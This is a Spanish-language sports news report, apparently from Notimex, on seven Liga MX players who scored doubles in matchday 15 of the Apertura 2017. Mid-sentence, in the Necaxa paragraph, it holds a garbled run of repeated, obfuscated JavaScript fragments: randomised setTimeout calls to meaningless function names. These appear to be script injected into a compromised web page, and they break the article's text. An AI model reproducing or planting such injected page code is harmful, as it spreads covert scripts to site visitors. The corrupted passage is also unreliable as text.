Siete jugadores de Liga MX anotaron dobletes en jornada 15

México. Con siete futbolistas que anotaron dos goles que valieron puntos importantes para sus equipos, se repartió este fin de semana la figura de la jornada 15 del Torneo Apertura 2017 de la Liga MX.

León se afianzó en lugares de liguilla al golear 6-2 a Veracruz y en dicho triunfo sobresalieron Elías Hernández y Mauro Boselli, éste último se colocó en la cima de romperredes con 11 dianas gracias a que aprovechó dos penales.

En el mismo encuentro, el “Polaco” Cristian Menéndez firmó el doblete con los jarochos y aunque de poco sirvieron sus goles, es de destacar sus seis tantos en este, su primer certamen en el futbol mexicano.

Necaxa también se encuentra por ahora en los puestos de “fiesta grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e” y gran parte de ello se debe a la goleada que le propinó a Lobos BUAP por 5-0, donde el paraguayo Carlos González y Martín Barragán aportaron dos goles cada uno.

El todavía campeón Chivas de Guadalajara se acordó de ganar en casa en este certamen y lo hizo gracias al aporte del juvenil José Juan Macías, quien ayudó con doblete en el triunfo de 3-1 sobre Xolos de Tijuana.

Finalmente el caboverdiano Djaniny Tavares colaboró con dos anotaciones para que Santos Laguna se repusiera y empatara 2-2 frente a Pachuca y así los “Guerreros” todavía sueñan con llegar a liguilla porque las matemáticas así lo permiten.

Así, este fin de semana contó con varios elementos que se destaparon con dobletes, Macías (Guadalajara), González (Necaxa) y Menéndez (Veracruz) lograron dos goles en un mismo encuentro por primera vez en Liga MX.

Fuente: Notimex

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Close